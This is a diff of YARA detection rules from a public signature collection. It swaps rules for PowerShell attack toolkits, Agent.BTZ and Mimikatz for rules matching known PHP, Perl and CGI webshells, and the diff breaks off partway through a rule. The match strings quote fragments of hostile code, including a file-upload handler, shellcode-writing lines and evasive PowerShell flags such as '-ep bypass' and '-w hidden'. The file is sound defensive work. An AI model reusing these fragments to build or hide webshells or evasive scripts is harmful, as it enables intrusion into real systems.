+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3938-L3950"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8cbd86f103d8b49e72787cbb85fc97e6a02d5332039ce29359cb673c273760b7"
-		score = 80
+		hash = "0b53b67bb3b004a8681e1458dd1895d0"
+		logic_hash = "6e6ffc4cad2a956cb2b6667928bac5996cf95cd36f43ba789144c46726471f07"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc65ec85dbcd49001e6037de9134086dd5559ac41ac4d1adf7cab319546758ad"
+		tags = ""
 
 	strings:
-		$s1 = "if($MyConString -like $([Text.Encoding]::Unicode.GetString([Convert]::" ascii
-		$s2 = "FromBase64String('KgBwAGEAcwBzAHcAbwByAGQAKgA=')))) {" ascii
-		$s3 = "$Null = Invoke-ServiceStart" ascii
-		$s4 = "Write-Warning \"[!] Access to service $" ascii
-		$s5 = "} = $MyConString.Split(\"=\")[1].Split(\";\")[0]" ascii
-		$s6 = "} += \"net localgroup ${" ascii
+		$s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+		$s3 = "Send this file: <INPUT NAME=\"userfile\" TYPE=\"file\">" fullword
+		$s4 = "<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">" fullword
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 2000KB and 2 of them ) or ( 4 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Persistence_2 : FILE
+rule SIGNATURE_BASE_Telnet_Pl
 {
 	meta:
-		description = "Auto-generated rule - from files Persistence.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d79c328b-4471-52bb-882c-12d2e1302c1e"
-		date = "2016-09-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L204-L226"
+		description = "Semi-Auto-generated  - file telnet.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "be4de017-e929-5dd3-a60e-f187456b1a55"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3951-L3962"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "47d1c3593edeba02e1c08cc53b4ba3d375b73dd04816b84e807e28be2bcf917e"
-		score = 80
+		hash = "dd9dba14383064e219e29396e242c1ec"
+		logic_hash = "2d1abc52fc70ce664a19e49e6fa4175bc8d8785dee332d5273323479d9628a8c"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e1a4dd18b481471fc25adea6a91982b7ffed1c2d393c8c17e6e542c030ac6cbd"
+		tags = ""
 
 	strings:
-		$s1 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')" ascii
-		$s2 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA')" ascii
-		$s3 = "FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA==')" ascii
-		$s4 = "[Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]" ascii
-		$s5 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA==')))" ascii
-		$s6 = "[Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]" fullword ascii
-		$s7 = "FromBase64String('TQBlAHQAaABvAGQA')" ascii
-		$s8 = "FromBase64String('VAByAGkAZwBnAGUAcgA=')" ascii
-		$s9 = "[Runtime.InteropServices.CallingConvention]::Winapi," fullword ascii
+		$s0 = "W A R N I N G: Private Server"
+		$s2 = "$Message = q$<pre><font color=\"#669999\"> _____  _____  _____          _____   "
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Inveigh_Bruteforce_3 : FILE
+rule SIGNATURE_BASE_W3D_Php_Php
 {
 	meta:
-		description = "Auto-generated rule - from files Inveigh-BruteForce.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d284e93b-dd65-5a39-84e2-287feb6ae05b"
-		date = "2016-09-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L228-L248"
+		description = "Semi-Auto-generated  - file w3d.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "1a4e3c84-2d3b-5245-bccc-9a5f59b9fc17"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3963-L3975"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "09afe669e90bd73318a9f9f68fda362451f6611f8585de67176c5dc43f05f937"
-		score = 80
+		hash = "987f66b29bfb209a0b4f097f84f57c3b"
+		logic_hash = "33f948a1ae4474daddd788df84fa8baabf4390ec242cad9a6a51dac0152d3b75"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash3 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
+		tags = ""
 
 	strings:
-		$s1 = "::FromBase64String('TgBUAEwATQA=')" ascii
-		$s2 = "::FromBase64String('KgBTAE0AQgAgAHIAZQBsAGEAeQAgACoA')))" ascii
-		$s3 = "::FromBase64String('KgAgAGYAbwByACAAcgBlAGwAYQB5ACAAKgA=')))" ascii
-		$s4 = "::FromBase64String('KgAgAHcAcgBpAHQAdABlAG4AIAB0AG8AIAAqAA==')))" ascii
-		$s5 = "[Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`" fullword ascii
-		$s6 = "KgAgAGwAbwBjAGEAbAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIAAqAA" ascii
-		$s7 = "}.bruteforce_running)" ascii
+		$s0 = "W3D Shell"
+		$s1 = "By: Warpboy"
+		$s2 = "No Query Executed"
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
+		2 of them
 }
-
-rule SIGNATURE_BASE_Agent_BTZ_Proxy_DLL_1 : FILE
+rule SIGNATURE_BASE_Webshell_Cgi
 {
 	meta:
-		description = "Detects Agent-BTZ Proxy DLL - activeds.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f8032616-2a54-5107-b330-65fcc84b866e"
-		date = "2017-08-07"
-		modified = "2023-12-05"
-		reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_agent_btz.yar#L13-L27"
+		description = "Semi-Auto-generated  - file WebShell.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "b768bb72-64e8-545a-9123-3d5889b58a82"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3976-L3987"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ea430b2888b487a5c7a91b73e8a7893b53d67e8ac95ae85fe9d15c633b2ee660"
+		hash = "bc486c2e00b5fc3e4e783557a2441e6f"
+		logic_hash = "8908ced96284de6b6d5ae693ba54c49a6333bbe5780d951cbacc91b4dde027df"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9c163c3f2bd5c5181147c6f4cf2571160197de98f496d16b38c7dc46b5dc1426"
-		hash2 = "628d316a983383ed716e3f827720915683a8876b54677878a7d2db376d117a24"
+		tags = ""
 
 	strings:
-		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Modules" fullword wide
+		$s0 = "WebShell.cgi"
+		$s2 = "<td><code class=\"entry-[% if entry.all_rights %]mine[% else"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them and pe.exports ( "Entry" ) )
+		all of them
 }
-
-rule SIGNATURE_BASE_Agent_BTZ_Proxy_DLL_2 : FILE
+rule SIGNATURE_BASE_Winx_Shell_Html
 {
 	meta:
-		description = "Detects Agent-BTZ Proxy DLL - activeds.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2777443d-6f63-5948-855a-e064a6e0310f"
-		date = "2017-08-07"
-		modified = "2023-12-05"
-		reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_agent_btz.yar#L29-L52"
+		description = "Semi-Auto-generated  - file WinX Shell.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "fe02d995-4375-5ce9-aabe-fae5d29278d3"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3988-L4000"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "41960e6deaee5d087b0eeee515b323cef8ead45ad305d053f6eb1897e204b003"
+		hash = "17ab5086aef89d4951fe9b7c7a561dda"
+		logic_hash = "4248f807d66990946523ba7b92d795c2c40429182389d9bf3f4a972e246b50c6"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "73db4295c5b29958c5d93c20be9482c1efffc89fc4e5c8ba59ac9425a4657a88"
-		hash2 = "380b0353ba8cd33da8c5e5b95e3e032e83193019e73c71875b58ec1ed389bdac"
-		hash3 = "f27e9bba6a2635731845b4334b807c0e4f57d3b790cecdc77d8fef50629f51a2"
+		tags = ""
 
 	strings:
-		$s1 = { 38 21 38 2C 38 37 38 42 38 4D 38 58 38 63 38 6E
-               38 79 38 84 38 8F 38 9A 38 A5 38 B0 38 BB 38 C6
-               38 D1 38 DC 38 E7 38 F2 38 FD 38 08 39 13 39 1E
-               39 29 39 34 39 3F 39 4A 39 55 39 60 39 6B 39 76
-               39 81 39 8C 39 97 39 A2 39 AD 39 B8 39 C3 39 CE
-               39 D9 39 E4 39 EF 39 FA 39 05 3A 10 3A 1B 3A 26
-               3A 31 3A 3C 3A 47 3A 52 3A 5D 3A 68 3A 73 3A 7E
-               3A 89 3A 94 3A 9F 3A AA 3A B5 3A C0 3A CB 3A D6
-               3A E1 3A EC 3A F7 3A }
-		$s2 = "activeds.dll" ascii fullword
+		$s0 = "WinX Shell"
+		$s1 = "Created by greenwood from n57"
+		$s2 = "<td><font color=\\\"#990000\\\">Win Dir:</font></td>"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them and pe.imphash ( ) == "09b7c73fbe5529e6de7137e3e8268b7b"
+		2 of them
 }
-
-rule SIGNATURE_BASE_Agent_BTZ_Aug17 : FILE
+rule SIGNATURE_BASE_Dx_Php_Php
 {
 	meta:
-		description = "Detects Agent.BTZ"
-		author = "Florian Roth (Nextron Systems)"
-		id = "31804208-3edb-554b-8820-e682db647435"
-		date = "2017-08-07"
-		modified = "2023-12-05"
-		reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_agent_btz.yar#L54-L73"
+		description = "Semi-Auto-generated  - file Dx.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "67d0bccb-d39a-5e30-bdc0-801525ebddd7"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4001-L4013"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cf4fc7820d516cf0322bf25460301b4d04f914814fc2a069164814dd4e1158be"
+		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
+		logic_hash = "ab43ddcf317eb4db890ca9750dc6bbc19b06b806339a67c82216df02bc2e8446"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "6ad78f069c3619d0d18eef8281219679f538cfe0c1b6d40b244beb359762cf96"
-		hash2 = "49c5c798689d4a54e5b7099b647b0596fb96b996a437bb8241b5dd76e974c24e"
-		hash3 = "e88970fa4892150441c1616028982fe63c875f149cd490c3c910a1c091d3ad49"
+		tags = ""
 
 	strings:
-		$s1 = "stdole2.tlb" fullword ascii
-		$s2 = "UnInstallW" fullword ascii
+		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s2 = "$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util"
+		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTTP"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them and pe.exports ( "Entry" ) and pe.exports ( "InstallW" ) and pe.exports ( "UnInstallW" ) )
+		1 of them
 }
-
-rule SIGNATURE_BASE_APT_Turla_Agent_BTZ_Gen_1 : FILE
+rule SIGNATURE_BASE_Csh_Php_Php
 {
 	meta:
-		description = "Detects Turla Agent.BTZ"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d5e1dd3d-4f03-5f79-898b-e612d2758b60"
-		date = "2018-06-16"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_agent_btz.yar#L75-L106"
+		description = "Semi-Auto-generated  - file csh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "da691516-d6c9-5c4b-85c3-f1cd7fc96ae7"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4014-L4027"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8616d95e683f213916f06a7bf672ced90b2fa55cb4331176021614b4f0b03aed"
-		score = 80
+		hash = "194a9d3f3eac8bc56d9a7c55c016af96"
+		logic_hash = "2a74e06a9fd59d7a577041b49403738904239fb011f9bfe2fb665165991b9c98"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "c905f2dec79ccab115ad32578384008696ebab02276f49f12465dcd026c1a615"
+		tags = ""
 
 	strings:
-		$x1 = "1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s" fullword ascii
-		$s1 = "release mutex - %u (%u)(%u)" fullword ascii
-		$s2 = "\\system32\\win.com" ascii
-		$s3 = "Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)" fullword ascii
-		$s4 = "MakeFile Error(%d) copy file to temp file %s" fullword ascii
-		$s5 = "%s%%s08x.tmp" fullword ascii
-		$s6 = "Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)" fullword ascii
-		$s7 = "Mutex_Log" fullword ascii
-		$s8 = "%s\\system32\\winview.ocx" fullword ascii
-		$s9 = "Microsoft(R) Windows (R) Operating System" fullword wide
-		$s10 = "Error: pos(%d) > CmdSize(%d)" fullword ascii
-		$s11 = "\\win.com" ascii
-		$s12 = "Error(%d) run %s " fullword ascii
-		$s13 = "%02d.%02d.%04d Log begin:" fullword ascii
+		$s0 = ".::[c0derz]::. web-shell"
+		$s1 = "http://c0derz.org.ua"
+		$s2 = "vint21h@c0derz.org.ua"
+		$s3 = "$name='63a9f0ea7bb98050796b649e85481845';//root"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "9d0d6daa47d6e6f2d80eb05405944f87" or ( pe.exports ( "Entry" ) and pe.exports ( "InstallM" ) and pe.exports ( "InstallS" ) ) or $x1 or 3 of them ) or ( 5 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_Keyword_Injectdll : FILE
+rule SIGNATURE_BASE_Phpinj_Php_Php
 {
 	meta:
-		description = "Detects suspicious InjectDLL keyword found in hacktools or possibly unwanted applications"
-		author = "Florian Roth (Nextron Systems)"
-		id = "422eed76-7dfa-5490-a866-d337434eaddc"
-		date = "2019-04-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/zerosum0x0/koadic"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_hacktool.yar#L2-L16"
+		description = "Semi-Auto-generated  - file pHpINJ.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "7bf54ef4-a3d8-51c6-8db7-bf8947e992ed"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4028-L4040"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "51c54026672e9ad36d2d68ae8dba61437f8808fbf2ad3c3c7bb086d8abb63987"
-		score = 60
+		hash = "d7a4b0df45d34888d5a09f745e85733f"
+		logic_hash = "5d39fd31cdaae7765267ce8a35a2fdcf86e7f0de40d4f303fb0f219c0fc04e40"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "2e7b4141e1872857904a0ef2d87535fd913cbdd9f964421f521b5a228a492a29"
+		tags = ""
 
 	strings:
-		$s2 = "InjectDLL" fullword ascii
-		$s4 = "Kernel32.dll" fullword ascii
+		$s1 = "News Remote PHP Shell Injection"
+		$s3 = "Php Shell <br />" fullword
+		$s4 = "<input type = \"text\" name = \"url\" value = \""
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_Python_Sectools
+rule SIGNATURE_BASE_Sig_2008_Php_Php
 {
 	meta:
-		description = "Detects code which uses the python lib sectools"
-		author = "Arnim Rupp"
-		id = "89a5e0ba-5547-53e4-84a3-d07ee779596e"
-		date = "2023-01-27"
-		modified = "2023-12-05"
-		reference = "https://github.com/p0dalirius/sectools"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_hacktool.yar#L18-L35"
+		description = "Semi-Auto-generated  - file 2008.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "bfa3caa9-70a5-536b-a887-58427eee43df"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4041-L4054"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "814ba1aa62bbb7aba886edae0f4ac5370818de15ca22a52a6ab667b4e93abf84"
-		hash = "b3328ac397d311e6eb79f0a5b9da155c4d1987e0d67487ea681ea59d93641d9e"
-		hash = "8cd205d5380278cff6673520439057e78fb8bf3d2b1c3c9be8463e949e5be4a1"
-		logic_hash = "17f6897dc623f822c7ae6a7ae51714e78316d7b7fdf59b9f2f625ecaae939522"
-		score = 50
+		hash = "3e4ba470d4c38765e4b16ed930facf2c"
+		logic_hash = "a437dc3dc836e93c7a691f7a000c4a4ae574ba95b3a216394ba42538beb9c0f7"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$import1 = "from sectools"
-		$import2 = "import sectools"
+		$s0 = "Codz by angel(4ngel)"
+		$s1 = "Web: http://www.4ngel.net"
+		$s2 = "$admin['cookielife'] = 86400;"
+		$s3 = "$errmsg = 'The file you want Downloadable was nonexistent';"
 
 	condition:
-		any of ( $import* )
+		1 of them
 }
-rule SIGNATURE_BASE_Powershell_Susp_Parameter_Combo : HIGHVOL FILE
+rule SIGNATURE_BASE_Ak74Shell_Php_Php
 {
 	meta:
-		description = "Detects PowerShell invocation with suspicious parameters"
-		author = "Florian Roth (Nextron Systems)"
-		id = "17c707f3-7f51-5772-9874-a96c220960a7"
-		date = "2017-03-12"
-		modified = "2025-12-16"
-		reference = "https://goo.gl/uAic1X"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_invocation.yar#L2-L77"
+		description = "Semi-Auto-generated  - file ak74shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "eaf243cb-fa26-5f34-a724-60a08acff636"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4055-L4067"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c359a1d2a460f2939a1dd0959687ed4fbc2d874e689b42ae4bc73ee05145cce3"
-		score = 60
-		quality = 31
-		tags = "HIGHVOL, FILE"
+		hash = "7f83adcb4c1111653d30c6427a94f66f"
+		logic_hash = "64eb7e72679fc9ee81af6f46d0ab604357710716b93b1ddfaebc5596c968fce8"
+		score = 75
+		quality = 60
+		tags = ""
 
 	strings:
-		$sa1 = " -enc " ascii wide nocase
-		$sa2 = " -EncodedCommand " ascii wide nocase
-		$sa3 = " /enc " ascii wide nocase
-		$sa4 = " /EncodedCommand " ascii wide nocase
-		$sb1 = " -w hidden " ascii wide nocase
-		$sb2 = " -window hidden " ascii wide nocase
-		$sb3 = " -windowstyle hidden " ascii wide nocase
-		$sb4 = " /w hidden " ascii wide nocase
-		$sb5 = " /window hidden " ascii wide nocase
-		$sb6 = " /windowstyle hidden " ascii wide nocase
-		$sc1 = " -nop " ascii wide nocase
-		$sc2 = " -noprofile " ascii wide nocase
-		$sc3 = " /nop " ascii wide nocase
-		$sc4 = " /noprofile " ascii wide nocase
-		$sd1 = " -noni " ascii wide nocase
-		$sd2 = " -noninteractive " ascii wide nocase
-		$sd3 = " /noni " ascii wide nocase
-		$sd4 = " /noninteractive " ascii wide nocase
-		$se1 = " -ep bypass " ascii wide nocase
-		$se2 = " -exec bypass " ascii wide nocase
-		$se3 = " -executionpolicy bypass " ascii wide nocase
-		$se4 = " -exec bypass " ascii wide nocase
-		$se5 = " /ep bypass " ascii wide nocase
-		$se6 = " /exec bypass " ascii wide nocase
-		$se7 = " /executionpolicy bypass " ascii wide nocase
-		$se8 = " /exec bypass " ascii wide nocase
-		$sf1 = " -sta " ascii wide
-		$sf2 = " /sta " ascii wide
-		$fp1 = "Chocolatey Software" ascii wide
-		$fp2 = "VBOX_MSI_INSTALL_PATH" ascii wide
-		$fp3 = "\\Local\\Temp\\en-US.ps1" ascii wide
-		$fp4 = "Lenovo Vantage - Battery Gauge Helper" wide fullword
-		$fp5 = "\\LastPass\\lpwinmetro\\AppxUpgradeUwp.ps1" ascii
-		$fp6 = "# use the encoded form to mitigate quoting complications that full scriptblock transfer exposes" ascii
-		$fp7 = "Write-AnsibleLog \"INFO - s" ascii
-		$fp8 = "\\Packages\\Matrix42\\" ascii
-		$fp9 = "echo " ascii
-		$fp10 = "install" ascii fullword
-		$fp11 = "REM " ascii
-		$fp12 = "set /p " ascii
-		$fp13 = "rxScan Application" wide
-		$fp14 = "psutil.tests"
-		$fpa1 = "All Rights"
-		$fpa2 = "<html"
-		$fpa2b = "<HTML"
-		$fpa3 = "Copyright"
-		$fpa4 = "License"
-		$fpa5 = "<?xml"
-		$fpa6 = "Help" fullword
-		$fpa7 = "COPYRIGHT"
+		$s1 = "$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_SESSION["
+		$s2 = "AK-74 Security Team Web Site: www.ak74-team.net"
+		$s3 = "$xshell"
 
 	condition:
-		filesize < 3000KB and 4 of ( $s* ) and not 1 of ( $fp* ) and uint32be( 0 ) != 0x456C6646
+		2 of them
 }
-rule SIGNATURE_BASE_Invoke_Mimikatz
+rule SIGNATURE_BASE_Rem_View_Php_Php
 {
 	meta:
-		description = "Detects Invoke-Mimikatz String"
-		author = "Florian Roth (Nextron Systems)"
-		id = "37de51a6-e1bb-5ee7-9b7f-8fe17b3697b5"
-		date = "2016-08-03"
-		modified = "2023-12-05"
-		reference = "https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_invoke_mimikatz.yar#L10-L24"
+		description = "Semi-Auto-generated  - file Rem View.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "6137434c-89e9-537b-9b26-b56178022b76"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4068-L4080"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b9bfa54a64d6f6b8af97ec62c9102ccf0912a19b65fbd25a4836480e63497a00"
+		hash = "29420106d9a81553ef0d1ca72b9934d9"
+		logic_hash = "bcd5c86e793748ffe0ce4415ee68101e8183e1f97477b49843938d254f08695a"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67"
 
 	strings:
-		$x2 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm" ascii
-		$x3 = "Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp" fullword ascii
+		$s0 = "$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\""
+		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
+		$s4 = "Welcome to phpRemoteView (RemView)"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_SUSP_Nullsoftinst_Combo_Oct20_1 : FILE
+rule SIGNATURE_BASE_Java_Shell_Js
 {
 	meta:
-		description = "Detects suspicious NullSoft Installer combination with common Copyright strings"
-		author = "Florian Roth (Nextron Systems)"
-		id = "380f30a6-df6b-50c6-bb2d-b8785564bbac"
-		date = "2020-10-06"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/malwrhunterteam/status/1313023627177193472"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_anomalies_keyword_combos.yar#L2-L33"
+		description = "Semi-Auto-generated  - file Java Shell.js.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "eff52c3a-fc3a-5e80-8da9-786168159ebc"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4081-L4093"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8aef24295281da5ffa1c6f865eaa6cc8d60ea1df670058220bdb97651b6114cd"
-		score = 65
+		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
